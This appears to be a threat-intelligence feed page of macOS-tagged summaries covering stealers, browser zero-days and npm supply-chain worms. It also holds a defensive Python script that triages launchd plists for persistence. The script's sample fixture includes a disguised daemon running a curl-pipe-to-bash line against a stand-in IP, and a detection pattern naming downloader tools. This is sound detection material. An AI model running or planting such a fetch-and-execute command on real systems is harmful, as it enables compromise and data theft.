Banshee is a macOS-native stealer offered as malware-as-a-service (MaaS) that phishes the user's login password via a fake System Preferences dialog, then uses it to decrypt the Keychain and harvest browser credentials, cookies, notes, and targeted files before quickly exfiltrating them. It validates the entered password with dscl in real time, collects the Keychain plus browser profiles, stages…
Tag: MACOS
Attackers poisoned search results to surface malicious ChatGPT and Grok conversations that instruct macOS users to copy and paste a Terminal one-liner which downloads and deploys an AMOS stealer. The campaign abuses the trust users place in the AI platforms and in the conversational answer format to harvest credentials, escalate to root, persist via a LaunchDaemon, and exfiltrate wallet, browser, and keychain data. #AMOS #macOS
This week's cyber stories highlight the rapid evolution of digital threats, from malware in movie downloads to sophisticated botnets exploiting system vulnerabilities. The Threatsday Bulletin provides a concise overview of major security incidents and emerging risks in the cyber landscape. #Mirai #LummaStealer…
Google has issued emergency updates to patch a zero-day vulnerability in Chrome that is actively exploited in the wild, affecting multiple operating systems. Since the beginning of the year, Google has fixed eight zero-day flaws, including recent critical bugs in the LibANGLE library and V8 engine. #ChromeZeroDay #LibANGLE #V8Engine #ThreatActors
Google has released security updates for Chrome to fix three vulnerabilities, including one actively exploited in the wild. The flaws mainly affect Google’s ANGLE library and could lead to memory corruption or arbitrary code execution. #ChromeVulnerabilities #ANGLELibrary…
A new cyberattack campaign exploits Google search ads to direct users to malicious AI chats that install the AMOS macOS infostealer malware. This campaign uses poisoned ChatGPT and Grok conversations to trick users into executing malicious commands, leading to potential data theft and device compromise. #AMOS #Grok #ChatGPT #macOS #Infostealer
This December’s Patch Tuesday includes critical updates for Windows, Notepad++, Fortinet, Ivanti, and more, addressing vulnerabilities actively exploited or publicly known. Timely application of these patches is essential to prevent privilege escalation, remote code execution, and credential bypass attacks. #CVE202562221 #Notepad++V8.8.9…
Adobe has released patches for nearly 140 vulnerabilities across its products, including critical bugs in ColdFusion and Experience Manager (AEM). Prompt application of these updates is urged to protect against potential exploitation. #ColdFusion #ExperienceManager #AdobeVulnerabilities…
A critical unauthenticated deserialization vulnerability in React Server Components (CVE-2025-55182, “React2Shell”) has been exploited in the wild to deliver cryptominers, a BitTorrent-DHT-backed Linux backdoor (PeerBlight), a reverse-proxy tunnel (CowTunnel), a Go post-exploitation implant (ZinFoq), and a Kaiji botnet variant across multiple organizations. Immediate patching of affected react-server-dom packages and Next.js mitigations are recommended to prevent these automated exploitation campaigns. #React2Shell #PeerBlight #CowTunnel #ZinFoq
Ivanti has issued security updates for multiple vulnerabilities in its Endpoint Manager (EPM) software, including a critical cross-site scripting flaw. These vulnerabilities pose risks primarily to exposed internet-facing instances, with potential remote code execution and session hijacking. #CVE-2025-10573 #EPM #Ivanti
Trend Research describes the discovery and technical analysis of GhostPenguin, a previously undocumented multi-threaded Linux backdoor that provides a remote /bin/sh shell and extensive filesystem operations over an RC5-encrypted UDP channel (initial handshake over UDP port 53). The backdoor was found using an AI-driven VirusTotal zero-detection hunting pipeline that decompiled and…
Google has released a Chrome browser update addressing 13 security vulnerabilities, including four high-severity flaws. One of them, CVE-2025-13633, is a use-after-free in the Digital Credentials feature that a remote attacker could potentially exploit. #ChromeUpdate #DigitalCredentialsVulnerability…
Attackers exploited a GitHub Actions injection vulnerability in Nx's workflow to steal an NPM publishing token, push malicious Nx packages, and use those packages to harvest credentials, SSH keys, and crypto wallets from developer systems. The campaign evolved into a self-replicating NPM supply-chain worm called Shai-Hulud that registers compromised hosts as self-hosted GitHub Actions runners and uses GitHub Discussions as a stealthy C2 channel. #ShaiHulud #Nx
DigitStealer is a macOS information stealer delivered as an unsigned DynamicLake.dmg that runs almost entirely in memory and abuses JavaScript for Automation (JXA) and AppleScript to harvest high-value data. It enforces geographic and Apple Silicon M2+ hardware checks, fetches four in-memory payloads (AppleScript stealer, two obfuscated JXA modules, and a LaunchAgent backdoor using DNS TXT for C2), and tampers with Ledger Live to enable seed-phrase exfiltration. #DigitStealer #LedgerLive
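Both the AMOS campaign (persistence via a LaunchDaemon) and DigitStealer (a LaunchAgent backdoor) rely on launchd property lists, which makes the LaunchAgents/LaunchDaemons directories the first place to hunt. The script below is an added example, not code from either article or from any vendor; it parses launchd plists with the standard-library plistlib and scores each entry on indicators chosen for this example (interpreters or downloaders in ProgramArguments, remote URL or IP literals, payloads under world-writable staging directories, RunAtLoad plus KeepAlive, and a com.apple.* label outside /System/Library, which is the only place Apple ships its own agents). The three sample plists and their paths are constructed inline so it runs offline; on a real host you would feed it the bytes of every plist under /Library/LaunchDaemons, /Library/LaunchAgents and ~/Library/LaunchAgents.

```python
"""Triage macOS launchd plists for stealer-style persistence (added example)."""
import plistlib
import re
from dataclasses import dataclass, field

# Indicator sets are assumptions for this example, not from the articles above.
SUSPICIOUS_TOKENS = re.compile(
    r"\b(curl|wget|osascript|python3?|bash|sh|zsh|base64|nohup)\b", re.IGNORECASE)
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/var/tmp/", "/private/var/tmp/", "/Users/Shared/")
REMOTE_REF = re.compile(r"https?://|\b\d{1,3}(?:\.\d{1,3}){3}\b")


@dataclass
class Finding:
    path: str
    label: str
    score: int = 0
    reasons: list = field(default_factory=list)

    def hit(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def program_argv(p: dict) -> list:
    """launchd accepts either ProgramArguments (argv) or Program (path); normalize to argv."""
    argv = p.get("ProgramArguments") or []
    if not argv and "Program" in p:
        argv = [p["Program"]]
    return [str(a) for a in argv]


def triage(path: str, plist_bytes: bytes) -> Finding:
    """Score one plist. Higher score = more persistence indicators present."""
    p = plistlib.loads(plist_bytes)
    argv = program_argv(p)
    joined = " ".join(argv)
    f = Finding(path=path, label=str(p.get("Label", "<no Label>")))
    if SUSPICIOUS_TOKENS.search(joined):
        f.hit(2, "interpreter or downloader in ProgramArguments")
    if REMOTE_REF.search(joined):
        f.hit(3, "remote URL or IP literal in ProgramArguments")
    if any(d in a for a in argv for d in STAGING_DIRS):
        f.hit(2, "executable or script under a world-writable staging dir")
    if p.get("RunAtLoad") and p.get("KeepAlive"):
        f.hit(1, "RunAtLoad + KeepAlive (auto-restarting persistence)")
    if f.label.startswith("com.apple.") and not path.startswith("/System/"):
        f.hit(2, "Apple-looking label outside /System/Library")
    return f


def scan(plists: dict, threshold: int = 3) -> list:
    """plists: {path: raw plist bytes}. Returns findings at or above threshold, worst first."""
    found = [triage(path, data) for path, data in plists.items()]
    return sorted((f for f in found if f.score >= threshold), key=lambda f: -f.score)


# Constructed sample plists: one benign vendor updater, one daemon masquerading as Apple
# that pulls a script from a TEST-NET address, one user agent running AppleScript from
# a hidden directory under /Users/Shared (the DigitStealer-style pattern).
SAMPLES = {
    "/Library/LaunchAgents/com.vendor.updater.plist": plistlib.dumps({
        "Label": "com.vendor.updater",
        "ProgramArguments": ["/Applications/Vendor.app/Contents/MacOS/updater", "--check"],
        "StartInterval": 86400,
    }),
    "/Library/LaunchDaemons/com.apple.securityd.helper.plist": plistlib.dumps({
        "Label": "com.apple.securityd.helper",
        "ProgramArguments": ["/bin/bash", "-c", "curl -fsSL http://203.0.113.5/p | bash"],
        "RunAtLoad": True,
        "KeepAlive": True,
    }),
    "/Users/alice/Library/LaunchAgents/com.example.agent.plist": plistlib.dumps({
        "Label": "com.example.agent",
        "ProgramArguments": ["/usr/bin/osascript", "/Users/Shared/.cache/loader.scpt"],
        "RunAtLoad": True,
    }),
}

if __name__ == "__main__":
    for f in scan(SAMPLES):
        print(f"[{f.score}] {f.label} ({f.path})")
        for r in f.reasons:
            print(f"      - {r}")
```

The scoring is deliberately coarse: it is a triage filter to shortlist entries for manual review (check the binary's code signature with codesign and its first-seen time), not a verdict. Tune the thresholds to your fleet; developer machines legitimately run python and bash from LaunchAgents far more often than end-user laptops do.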
Sha1-Hulud has launched a sophisticated supply-chain attack targeting npm packages used by JavaScript developers, infecting nearly 1,000 packages and exposing tens of thousands of repositories. The latest campaign includes new features like cross-platform support, a self-destruct mechanism, and remote code execution via GitHub Actions, increasing the threat’s severity. #Sha1Hulud #npmSupplyChainAttack…